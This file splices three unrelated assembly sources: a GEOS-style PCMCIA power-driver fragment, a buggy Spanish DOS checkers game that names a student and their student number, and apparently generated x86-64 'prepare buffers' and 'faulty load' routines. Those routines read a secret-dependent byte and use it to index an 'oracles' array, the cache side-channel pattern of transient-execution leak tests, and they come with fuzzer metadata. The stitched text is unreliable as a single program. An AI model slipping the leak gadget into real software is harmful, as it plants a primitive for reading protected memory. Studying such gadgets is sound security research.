continuePowerOn:
call SysExitCritical
continuePowerOn_CriticalExited:
pop ax, bx
mov cx, -1
call PGFSPowerOnOffCommon
.leave
ret
PGFSPowerOn endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
PGFSPowerOff
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Turn off the power
CALLED BY: GFSDiskUnlock
PASS: es:bx - DriveStatusEntry
RETURN: carry clear
DESTROYED: nothing
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 5/ 5/94 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
PGFSPowerOff proc near
uses ds, cx
.enter
call LoadVarSegDS
clr cx
call PGFSPowerOnOffCommon
.leave
ret
PGFSPowerOff endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
PGFSPowerOnOffCommon
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Call the power driver
CALLED BY: PGFSPowerOn, PGFSPowerOff
PASS: cx - nonzero to turn power on, zero to power off
ds - dgroup
es:bx - DriveStatusEntry
RETURN: carry clear
DESTROYED: nothing
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 5/ 5/94 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
PGFSPowerOnOffCommon proc near
tst ds:[powerStrat].segment
jz done
push ax, bx, dx, di
mov ax, PDT_PCMCIA_SOCKET
mov bx, es:[bx].DSE_private
mov bx, es:[bx].PGFSPD_common.PCMDPD_socket
mov dx, mask PCMCIAPI_NO_POWER_OFF
mov di, DR_POWER_DEVICE_ON_OFF
call ds:[powerStrat]
pop ax, bx, dx, di
done:
clc
ret
PGFSPowerOnOffCommon endp
Resident ends
|
; C O L U M N A
; 0 1 2 3 4 5 6 7
; 0 01 02 03 04 05 06 07 08 R
; 1 09 10 11 12 13 14 15 16 E
; 2 17 18 19 20 21 22 23 24 N
; 3 25 26 27 28 29 30 31 32 G
; 4 33 34 35 36 37 38 39 40 L
; 5 41 42 43 44 45 46 47 48 O
; 6 49 50 51 52 53 54 55 56 N
; 7 57 58 59 60 61 62 63 64
.model small
.stack 200h
VAL_LF EQU 10 ; constante de la line fide
VAL_RET EQU 13 ; variable de retorno
CHR_FIN EQU '$'
MAX_COL EQU 8 ; son 4 porque esta normal (imprime normal 2 lines)
MAX_COL2 EQU 10 ; son 6 porque se le suma el fin y salto de linea (imprime como matriz)
;====================================================================================
;====================================================================================
;====================================================================================
;====================================================================================
.data
; Definimos un nuevo arreglo de 4 por 4----> duplico 4 bites
;y dentro de ellos otros 4 OJO en si 4 reglones 6 columnas esta es para desplegar ya como
; 0 1 2 3 4 VAL_LF VAL_RET
; 0 01 02 03 04 05 - -
; 1 06 07 08 09 10 - -
; 2 11 12 13 14 15 - -
; 3 16 17 18 19 20 - -
; 4 21 22 23 24 25 - -
matIntEdades2 DB 8 DUP (8 DUP ("x"),VAL_LF,VAL_RET)
strFin2 DB VAL_LF,VAL_RET,CHR_FIN
;MENSAJES DE LA CARATULA
titulo db 13,10,'Universidad de Sancarlos de Guatemala',13,10,'$'
titulo2 db 13,10,'Facultad de Ingenieria',13,10,'$'
titulo3 db 13,10,'Ciencias y Sistemas',13,10,'$'
titulo4 db 13,10,'Arquitectura de Computadores y Ensambladores 1',13,10,'$'
titulo5 db 13,10,'Nombre: Cesar Alejandro Sazo Quisquinay',13,10,'$'
titulo6 db 13,10,'Carnet: 201513858',13,10,'$'
titulo7 db 13,10,'Seccion: A',13,10,'$'
mensaje db '-1 Iniciar Juego',13,10,'-2 Cargar Juego',13,10,'-3 Salir',13,10,'$'
mensaje1 db 'Pantalla en color azul',13,10,'$'
mensaje2 db 'Pantalla en color morado',13,10,'$'
mensaje3 db 'Pantalla en color gris con letras negras',13,10,'$'
;MENSJAES DEL JUEGO
mensajejuego db 13,10,'Turno Blancas: ','$'
mensajejuego2 db 13,10,'Turno Negras: ','$'
mensajejuego3 db 13,10,'Casilla Actual x-y: ','$'
mensajejuego4 db 13,10,'Casilla Destino x-y: ','$'
mensajejuego5 db 13,10,'Casilla Actual y-x: ','$'
mensajejuego6 db 13,10,'Casilla Destino y-x: ','$'
mensajejuego7 db 13,10,'Casilla Actual/Destino: ','$'
;variables para la posicion del juego a moverser
n_xActual db ?
n_yActual db ?
n_xDestino db ?
n_yDestino db ?
;====================================================================================
;====================================================================================
;====================================================================================
;====================================================================================
cadena db 100 dup(' '),'$'
cadenaTurnos db 100 dup(' '),'$'
.code
codigo segment
assume ds:@data, cs:codigo
inicio:
mov ax,@data ;llamar a .data
mov ds,ax ;guardar los datos en ds
mov ah,0 ;limpia el registro
;================CARATULA===============================
;========================================================
lea dx,titulo ;imprimir el mensaje
mov ah,9h
int 21h
lea dx,titulo2 ;imprimir el mensaje
mov ah,9h
int 21h
lea dx,titulo3 ;imprimir el mensaje
mov ah,9h
int 21h
lea dx,titulo4 ;imprimir el mensaje
mov ah,9h
int 21h
lea dx,titulo5 ;imprimir el mensaje
mov ah,9h
int 21h
lea dx,titulo6 ;imprimir el mensaje
mov ah,9h
int 21h
lea dx,titulo7 ;imprimir el mensaje
mov ah,9h
int 21h
;=====================================================================0
lea dx,mensaje ;imprimir mensaje
mov ah,9h
int 21h
;nueva comparacion
mov ah, 3fh
mov bx,00
mov cx,100
mov dx, offset[cadena]
int 21h
mov ah, 09h
mov dx, offset[cadena]
int 21h
;para los otros comandos
cmp cadena[0],'e'; para exit
jz CarharJuegoMetodo
cmp cadena[0],'s'; para exit
jz CarharJuegoMetodo
cmp cadena[1],'h'; para show
jz CarharJuegoMetodo
;para los comandos
cmp cadena[0],'1'
jz IniciarJuegoMetodo ; inicar juego
cmp cadena[0],'2'
jz CarharJuegoMetodo ; cargar juego
cmp cadena[0],'3'
jz FinalizarJuego
;termina nueva comparacion
FinalizarJuego:
mov ax,4c00h ;funcion que termina el programa
int 21h
IniciarJuegoMetodo:
;llama al procedimiento
CALL CargarTablero
CarharJuegoMetodo:
CALL MORADOPROC ;llama al procedimiento
CargarTableroMetodo:
CALL CargarTablero
CargarTablero PROC NEAR
; movemos a ax los datos
mov ax, @data
; movesmo a ds ax
mov ds,ax
;PARTE DE MODIFICACION DE LA MATRIZ modificamos un valor en la matriz normal
;FORMULA= REN * MAX_COL + COL
; movemos para mostrar el mensaje
mov dx,offset matIntEdades2
mov ah,09
int 21h
;FORMULA= REN * MAX_COL + COL
;FICHASNEGRAS
mov matIntEdades2 + 0 * MAX_COL2 + 1,78 ; muevo e 0 a REN 0 COL 2
mov matIntEdades2 + 0 * MAX_COL2 + 3,78
mov matIntEdades2 + 0 * MAX_COL2 + 5,78
mov matIntEdades2 + 0 * MAX_COL2 + 7,78
mov matIntEdades2 + 1 * MAX_COL2 + 0,78
mov matIntEdades2 + 1 * MAX_COL2 + 2,78
mov matIntEdades2 + 1 * MAX_COL2 + 4,78
mov matIntEdades2 + 2 * MAX_COL2 + 1,78
mov matIntEdades2 + 2 * MAX_COL2 + 3,78
mov matIntEdades2 + 2 * MAX_COL2 + 5,78
mov matIntEdades2 + 2 * MAX_COL2 + 7,78
;FICHASBLANCAS
mov matIntEdades2 + 7 * MAX_COL2 + 0,66 ; muevo e 0 a REN 0 COL 2
mov matIntEdades2 + 7 * MAX_COL2 + 2,66
mov matIntEdades2 + 7 * MAX_COL2 + 4,66
mov matIntEdades2 + 7 * MAX_COL2 + 6,66
mov matIntEdades2 + 6 * MAX_COL2 + 1,66
mov matIntEdades2 + 6 * MAX_COL2 + 3,66
mov matIntEdades2 + 6 * MAX_COL2 + 5,66
mov matIntEdades2 + 6 * MAX_COL2 + 7,66
mov matIntEdades2 + 5 * MAX_COL2 + 0,66
mov matIntEdades2 + 5 * MAX_COL2 + 2,66
mov matIntEdades2 + 5 * MAX_COL2 + 4,66
mov matIntEdades2 + 5 * MAX_COL2 + 6,66
int 21h
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h ;interrupcion para capturar
CALL PROBLANCASACTUAL
RET
CargarTablero ENDP
;PROCESO DE BLANCAS=========================================================================================================
;PROCESOSTEMPORALES si sirve es para movimiento blancas ACTUAL
PROBLANCASACTUAL PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h ;interrupcion para capturar
;imprimios
lea dx,mensajejuego; =turno de blancas
mov ah,9h
int 21h
; imprmimos
lea dx,mensajejuego3; posicion actual x-y
mov ah,9h
int 21h
;===
;nueva comparacion
mov ah, 3fh
mov bx,00
mov cx,100
mov dx, offset[cadena]
int 21h
mov ah, 09h
mov dx, offset[cadena]
int 21h
;para los otros comandos
cmp cadena[0],'E'; para exit
jz LLAMARAINICIO
;para los comandos
cmp cadena[0],'a'
jz VariableXactualM ; inicar juego
cmp cadena[0],'b'
jz VariableXactualM ; cargar juego
cmp cadena[0],'c'
jz VariableXactualM
cmp cadena[0],'d'
jz VariableXactualM
cmp cadena[0],'e'
jz VariableXactualM
cmp cadena[0],'f'
jz VariableXactualM
cmp cadena[0],'g'
jz VariableXactualM
cmp cadena[0],'h'
jz VariableXactualM
cmp cadena[0],'1'
jz VariableYactualM
cmp cadena[0],'2'
jz VariableYactualM
cmp cadena[0],'3'
jz VariableYactualM
cmp cadena[0],'4'
jz VariableYactualM
cmp cadena[0],'5'
jz VariableYactualM
cmp cadena[0],'6'
jz VariableYactualM
cmp cadena[0],'7'
jz VariableYactualM
cmp cadena[0],'8'
jz VariableYactualM
CALL PROBLANCASACTUAL
RET
PROBLANCASACTUAL ENDP
;TERMINAPROCESOSTEMPORALES====
VariableXactualM:
CALL GuardarVariablexActual
VariableYactualM:
CALL GuardarVariableyActual
LLAMARAINICIO:
CALL prollamarinicio
;PROCESOSTEMPORALES si sirve es para movimiento blancas DESTINO
PROBLANCASDESTINO PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h ;interrupcion para capturar
;imprimios
lea dx,mensajejuego; =turno de blancas
mov ah,9h
int 21h
; imprmimos
lea dx,mensajejuego4; posicion destino x-y
mov ah,9h
int 21h
;===
;nueva comparacion
mov ah, 3fh
mov bx,00
mov cx,100
mov dx, offset[cadena]
int 21h
mov ah, 09h
mov dx, offset[cadena]
int 21h
;para los otros comandos
cmp cadena[0],'E'; para exit
jz LLAMARAINICIODestino
;para los comandos
cmp cadena[0],'a'
jz VariableXMDestino ; inicar juego
cmp cadena[0],'b'
jz VariableXMDestino ; cargar juego
cmp cadena[0],'c'
jz VariableXMDestino
cmp cadena[0],'d'
jz VariableXMDestino
cmp cadena[0],'e'
jz VariableXMDestino
cmp cadena[0],'f'
jz VariableXMDestino
cmp cadena[0],'g'
jz VariableXMDestino
cmp cadena[0],'h'
jz VariableXMDestino
cmp cadena[0],'1'
jz VariableYMDestino
cmp cadena[0],'2'
jz VariableYMDestino
cmp cadena[0],'3'
jz VariableYMDestino
cmp cadena[0],'4'
jz VariableYMDestino
cmp cadena[0],'5'
jz VariableYMDestino
cmp cadena[0],'6'
jz VariableYMDestino
cmp cadena[0],'7'
jz VariableYMDestino
cmp cadena[0],'8'
jz VariableYMDestino
;termina nueva comparacion
;===
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h
CALL PROBLANCASDESTINO
RET
PROBLANCASDESTINO ENDP
;TERMINAPROCESOSTEMPORALES====
VariableXMDestino:
CALL GuaradarVariablexDestino
VariableYMDestino:
CALL GuardarVariableyDestino
LLAMARAINICIODestino:
CALL prollamarinicio
prollamarinicio PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
CALL inicio
RET
prollamarinicio ENDP
GuaradarVariablexDestino PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
; imprmimos
mov ah, 01h
int 21h
sub al,30h
mov n_xDestino,al
CALL PROBLANCASDESTINO
RET
GuaradarVariablexDestino ENDP
GuardarVariableyDestino PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
; imprmimos
mov ah, 01h
int 21h
sub al,30h
mov n_yDestino,al
;IMPRESION DE TODOS LOS DATOS
lea dx,mensajejuego7; posicion actual x-y
mov ah,9h
int 21h
mov ah,02h
mov dl,n_xActual
add dl,30h
int 21h
mov ah,02h
mov dl,n_yActual
add dl,30h
int 21h
mov ah,02h
mov dl,n_xDestino
add dl,30h
int 21h
mov ah,02h
mov dl,n_yDestino
add dl,30h
int 21h
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h ;interrupcion para capturar
CALL PRONEGRASACTUAL
RET
GuardarVariableyDestino ENDP
GuardarVariablexActual PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
mov ah, 01h
int 21h
sub al,30h
mov n_xActual,al
CALL PROBLANCASACTUAL
RET
GuardarVariablexActual ENDP
GuardarVariableyActual PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
;leemos
mov ah, 01h
int 21h
sub al,30h
mov n_yActual,al
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h
CALL PROBLANCASDESTINO
RET
GuardarVariableyActual ENDP
;PROCESO DE BLANCAS=========================================================================================================
;PROCESO DE NEGRAS=========================================================================================================
;MOVIEMIENTO ACTUAL de las negras
PRONEGRASACTUAL PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h ;interrupcion para capturar
;imprimios
lea dx,mensajejuego2; =turno de negras
mov ah,9h
int 21h
; imprmimos
lea dx,mensajejuego3; posicion actual x-y
mov ah,9h
int 21h
;===
;nueva comparacion
mov ah, 3fh
mov bx,00
mov cx,100
mov dx, offset[cadena]
int 21h
mov ah, 09h
mov dx, offset[cadena]
int 21h
;para los otros comandos
cmp cadena[0],'E'; para exit
jz LLAMARAINICION
;para los comandos
cmp cadena[0],'a'
jz VariableXactualMN ; inicar juego
cmp cadena[0],'b'
jz VariableXactualMN ; cargar juego
cmp cadena[0],'c'
jz VariableXactualMN
cmp cadena[0],'d'
jz VariableXactualMN
cmp cadena[0],'e'
jz VariableXactualMN
cmp cadena[0],'f'
jz VariableXactualMN
cmp cadena[0],'g'
jz VariableXactualMN
cmp cadena[0],'h'
jz VariableXactualMN
cmp cadena[0],'1'
jz VariableYactualMN
cmp cadena[0],'2'
jz VariableYactualMN
cmp cadena[0],'3'
jz VariableYactualMN
cmp cadena[0],'4'
jz VariableYactualMN
cmp cadena[0],'5'
jz VariableYactualMN
cmp cadena[0],'6'
jz VariableYactualMN
cmp cadena[0],'7'
jz VariableYactualMN
cmp cadena[0],'8'
jz VariableYactualMN
CALL PRONEGRASACTUAL
RET
PRONEGRASACTUAL ENDP
;TERMINAPROCESOSTEMPORALES====
VariableXactualMN:
CALL GuardarVariablexActualN
VariableYactualMN:
CALL GuardarVariableyActualN
LLAMARAINICION:
CALL prollamarinicioN
prollamarinicioN PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
CALL inicio
RET
prollamarinicioN ENDP
;PROCESOSTEMPORALES si sirve es para movimiento blancas DESTINO
PRONEGRASDESTINO PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h ;interrupcion para capturar
;imprimios
lea dx,mensajejuego2; =turno de blancas
mov ah,9h
int 21h
; imprmimos
lea dx,mensajejuego4; posicion destino x-y
mov ah,9h
int 21h
;===
;nueva comparacion
mov ah, 3fh
mov bx,00
mov cx,100
mov dx, offset[cadena]
int 21h
mov ah, 09h
mov dx, offset[cadena]
int 21h
;para los otros comandos
cmp cadena[0],'E'; para exit
jz LLAMARAINICIODestinoN
;para los comandos
cmp cadena[0],'a'
jz VariableXMDestinoN ; inicar juego
cmp cadena[0],'b'
jz VariableXMDestinoN ; cargar juego
cmp cadena[0],'c'
jz VariableXMDestinoN
cmp cadena[0],'d'
jz VariableXMDestinoN
cmp cadena[0],'e'
jz VariableXMDestinoN
cmp cadena[0],'f'
jz VariableXMDestinoN
cmp cadena[0],'g'
jz VariableXMDestinoN
cmp cadena[0],'h'
jz VariableXMDestinoN
cmp cadena[0],'1'
jz VariableYMDestinoN
cmp cadena[0],'2'
jz VariableYMDestinoN
cmp cadena[0],'3'
jz VariableYMDestinoN
cmp cadena[0],'4'
jz VariableYMDestinoN
cmp cadena[0],'5'
jz VariableYMDestinoN
cmp cadena[0],'6'
jz VariableYMDestinoN
cmp cadena[0],'7'
jz VariableYMDestinoN
cmp cadena[0],'8'
jz VariableYMDestinoN
;termina nueva comparacion
;===
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h
CALL PRONEGRASDESTINO
RET
PRONEGRASDESTINO ENDP
;TERMINAPROCESOSTEMPORALES====
VariableXMDestinoN:
CALL GuaradarVariablexDestinoN
VariableYMDestinoN:
CALL GuardarVariableyDestinoN
LLAMARAINICIODestinoN:
CALL prollamarinicioN2
prollamarinicioN2 PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
CALL inicio
RET
prollamarinicioN2 ENDP
GuaradarVariablexDestinoN PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
; imprmimos
mov ah, 01h
int 21h
sub al,30h
mov n_xDestino,al
CALL PRONEGRASDESTINO
RET
GuaradarVariablexDestinoN ENDP
GuardarVariableyDestinoN PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
; imprmimos
mov ah, 01h
int 21h
sub al,30h
mov n_yDestino,al
;IMPRESION DE TODOS LOS DATOS
lea dx,mensajejuego7; posicion actual x-y
mov ah,9h
int 21h
mov ah,02h
mov dl,n_xActual
add dl,30h
int 21h
mov ah,02h
mov dl,n_yActual
add dl,30h
int 21h
mov ah,02h
mov dl,n_xDestino
add dl,30h
int 21h
mov ah,02h
mov dl,n_yDestino
add dl,30h
int 21h
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h ;interrupcion para capturar
CALL MODIFICARMATRIZ;clavo lo que ivaPROBLANCASACTUAL
RET
GuardarVariableyDestinoN ENDP
GuardarVariablexActualN PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
mov ah, 01h
int 21h
sub al,30h
mov n_xActual,al
CALL PRONEGRASACTUAL
RET
GuardarVariablexActualN ENDP
GuardarVariableyActualN PROC NEAR
mov ah,0 ;limpia el registro
mov al,3h ;modo de texto
int 10h
;leemos
mov ah, 01h
int 21h
sub al,30h
mov n_yActual,al
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h
CALL PRONEGRASDESTINO
RET
GuardarVariableyActualN ENDP
;PROCESO DE BLANCAS=========================================================================================================
MORADOPROC PROC NEAR
mov ah,0
mov al,3h
int 10h
mov ax,0600h
mov bh,5fh
mov cx,0000h
mov dx,184Fh
int 10h
lea dx,mensaje2
mov ah,9h
int 21h
CALL inicio
RET
MORADOPROC ENDP
COMPARACIONDEFICHASNEGRAS PROC NEAR
mov ah,0
mov al,3h
int 10h
cmp n_xActual,'a'
jz MODIFICARMATRIZ
cmp n_yActual,'1'
jz MODIFICARMATRIZ
CALL MODIFICARMATRIZ
RET
COMPARACIONDEFICHASNEGRAS ENDP
MODIFICARMATRIZ PROC NEAR
mov ah,0
mov al,3h
int 10h
;PARTE DE MODIFICACION DE LA MATRIZ modificamos un valor en la matriz normal
;FORMULA= REN * MAX_COL + COL
; movemos para mostrar el mensaje
mov dx,offset matIntEdades2
mov ah,09
int 21h
;FORMULA= REN * MAX_COL + COL
cmp n_xActual,'a' ;esto es la columna
jz x1; muevo e 0 a REN 0 COL 2
cmp n_xActual,'b' ;esto es la columna
jz x2; muevo e 0 a REN 0 COL 2
cmp n_xActual,'c' ;esto es la columna
jz x3; muevo e 0 a REN 0 COL 2
cmp n_xActual,'d' ;esto es la columna
jz x4; muevo e 0 a REN 0 COL 2
cmp n_xActual,'e' ;esto es la columna
jz x5; muevo e 0 a REN 0 COL 2
cmp n_xActual,'f' ;esto es la columna
jz x6; muevo e 0 a REN 0 COL 2
cmp n_xActual,'g' ;esto es la columna
jz x7; muevo e 0 a REN 0 COL 2
cmp n_xActual,'h' ;esto es la columna
jz x8; muevo e 0 a REN 0 COL 2
; mov matIntEdades2 + n_xActual * MAX_COL2 + n_yActual,87 ; muevo e 0 a REN 0 COL 2
x1:
mov matIntEdades2 + 1 * MAX_COL2 + 0,87 ; muevo e 0 a REN 0 COL 2
x2:
mov matIntEdades2 + 1 * MAX_COL2 + 1,87 ; muevo e 0 a REN 0 COL 2
x3:
mov matIntEdades2 + 1 * MAX_COL2 + 2,87 ; muevo e 0 a REN 0 COL 2
x4:
mov matIntEdades2 + 1 * MAX_COL2 + 3,87 ; muevo e 0 a REN 0 COL 2
x5:
mov matIntEdades2 + 1 * MAX_COL2 + 4,87 ; muevo e 0 a REN 0 COL 2
x6:
mov matIntEdades2 + 1 * MAX_COL2 + 5,87 ; muevo e 0 a REN 0 COL 2
x7:
mov matIntEdades2 + 1 * MAX_COL2 + 6,87 ; muevo e 0 a REN 0 COL 2
x8:
mov matIntEdades2 + 1 * MAX_COL2 + 7,87 ; muevo e 0 a REN 0 COL 2
;FICHASBLANCAS
; mov matIntEdades2 + n_xDestino * MAX_COL2 + n_xDestino,87 ; muevo e 0 a REN 0 COL 2
; int 21h
mov dx,offset matIntEdades2
mov ah,09
int 21h
mov ah,08 ;pausa y espera a que el usuario precione una tecla
int 21h ;interrupcion para capturar
CALL inicio
RET
MODIFICARMATRIZ ENDP
codigo ends
end inicio
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %r14
push %rax
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0xd797, %rsi
nop
nop
nop
nop
mfence
movl $0x61626364, (%rsi)
nop
nop
nop
nop
inc %r14
lea addresses_normal_ht+0xc52f, %r10
nop
nop
nop
nop
nop
cmp $3911, %rcx
mov (%r10), %r13w
mfence
lea addresses_WC_ht+0x1b597, %r13
add %rcx, %rcx
mov (%r13), %esi
nop
nop
nop
nop
cmp $25870, %r13
lea addresses_UC_ht+0x1de71, %rcx
nop
nop
nop
nop
nop
sub %r10, %r10
mov $0x6162636465666768, %r14
movq %r14, %xmm4
movups %xmm4, (%rcx)
nop
sub %r14, %r14
lea addresses_A_ht+0x19d7b, %r10
clflush (%r10)
sub $15925, %rcx
mov (%r10), %eax
nop
nop
nop
nop
inc %rax
lea addresses_UC_ht+0x175ff, %rcx
clflush (%rcx)
nop
nop
nop
nop
add $25594, %r10
mov (%rcx), %r14w
nop
cmp $8708, %rcx
lea addresses_A_ht+0x45f7, %rsi
nop
nop
nop
nop
nop
cmp %r13, %r13
mov $0x6162636465666768, %rbp
movq %rbp, %xmm1
and $0xffffffffffffffc0, %rsi
movntdq %xmm1, (%rsi)
nop
nop
nop
nop
nop
and %rbp, %rbp
lea addresses_A_ht+0x1d817, %rax
nop
nop
nop
nop
nop
sub $60422, %r13
mov (%rax), %bp
and %rcx, %rcx
lea addresses_UC_ht+0xec97, %rcx
and %r14, %r14
movb (%rcx), %al
nop
nop
nop
nop
sub %r13, %r13
lea addresses_D_ht+0x19fc7, %r10
nop
nop
and %rcx, %rcx
and $0xffffffffffffffc0, %r10
movaps (%r10), %xmm1
vpextrq $0, %xmm1, %rbp
nop
nop
lfence
lea addresses_D_ht+0x8397, %rsi
nop
nop
nop
xor $22265, %rbp
mov (%rsi), %ax
nop
nop
nop
nop
nop
sub %rbp, %rbp
lea addresses_WC_ht+0x43eb, %rbp
nop
nop
nop
and $35275, %r13
movb $0x61, (%rbp)
nop
cmp %rsi, %rsi
lea addresses_normal_ht+0x19647, %rsi
lea addresses_UC_ht+0x17997, %rdi
clflush (%rdi)
nop
nop
nop
nop
cmp $39148, %rbp
mov $20, %rcx
rep movsl
nop
nop
nop
cmp $32165, %rbp
lea addresses_WC_ht+0x8bdd, %rbp
nop
nop
nop
nop
cmp %r13, %r13
mov $0x6162636465666768, %r10
movq %r10, (%rbp)
nop
nop
nop
nop
nop
add %r14, %r14
lea addresses_WT_ht+0x18097, %r13
nop
nop
nop
nop
nop
cmp $14998, %rax
mov (%r13), %edi
add $65353, %rax
pop %rsi
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r14
pop %r13
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r13
push %r14
push %r9
push %rcx
push %rdi
push %rdx
// Load
lea addresses_US+0x19197, %rcx
nop
dec %r12
vmovaps (%rcx), %ymm4
vextracti128 $0, %ymm4, %xmm4
vpextrq $0, %xmm4, %r13
sub %r12, %r12
// Store
lea addresses_PSE+0x17597, %rcx
nop
nop
nop
dec %r9
mov $0x5152535455565758, %r13
movq %r13, %xmm4
movups %xmm4, (%rcx)
xor %rdx, %rdx
// Store
lea addresses_PSE+0x8657, %rdx
nop
and %rdi, %rdi
mov $0x5152535455565758, %rcx
movq %rcx, (%rdx)
nop
nop
nop
nop
nop
sub $5371, %rdi
// Store
lea addresses_WC+0x16e5f, %rdx
nop
nop
nop
nop
nop
dec %rcx
mov $0x5152535455565758, %r9
movq %r9, %xmm0
vmovups %ymm0, (%rdx)
nop
nop
nop
nop
sub $29407, %r9
// Faulty Load
lea addresses_US+0x19197, %rdi
nop
nop
sub %rcx, %rcx
vmovups (%rdi), %ymm4
vextracti128 $1, %ymm4, %xmm4
vpextrq $0, %xmm4, %r12
lea oracles, %r14
and $0xff, %r12
shlq $12, %r12
mov (%r14,%r12,1), %r12
pop %rdx
pop %rdi
pop %rcx
pop %r9
pop %r14
pop %r13
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_US', 'same': False, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_US', 'same': True, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_PSE', 'same': False, 'size': 16, 'congruent': 9, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_PSE', 'same': False, 'size': 8, 'congruent': 4, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_WC', 'same': False, 'size': 32, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
[Faulty Load]
{'src': {'type': 'addresses_US', 'same': True, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'dst': {'type': 'addresses_D_ht', 'same': False, 'size': 4, 'congruent': 7, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_normal_ht', 'same': False, 'size': 2, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_WC_ht', 'same': False, 'size': 4, 'congruent': 9, 'NT': True, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_UC_ht', 'same': False, 'size': 16, 'congruent': 1, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_A_ht', 'same': False, 'size': 4, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_UC_ht', 'same': False, 'size': 2, 'congruent': 3, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_A_ht', 'same': False, 'size': 16, 'congruent': 5, 'NT': True, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_A_ht', 'same': False, 'size': 2, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_UC_ht', 'same': False, 'size': 1, 'congruent': 8, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_D_ht', 'same': False, 'size': 16, 'congruent': 0, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_D_ht', 'same': False, 'size': 2, 'congruent': 9, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_WC_ht', 'same': False, 'size': 1, 'congruent': 1, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_normal_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 11, 'same': False}, 'OP': 'REPM'}
{'dst': {'type': 'addresses_WC_ht', 'same': False, 'size': 8, 'congruent': 1, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_WT_ht', 'same': False, 'size': 4, 'congruent': 7, 'NT': True, 'AVXalign': True}, 'OP': 'LOAD'}
{'00': 60}
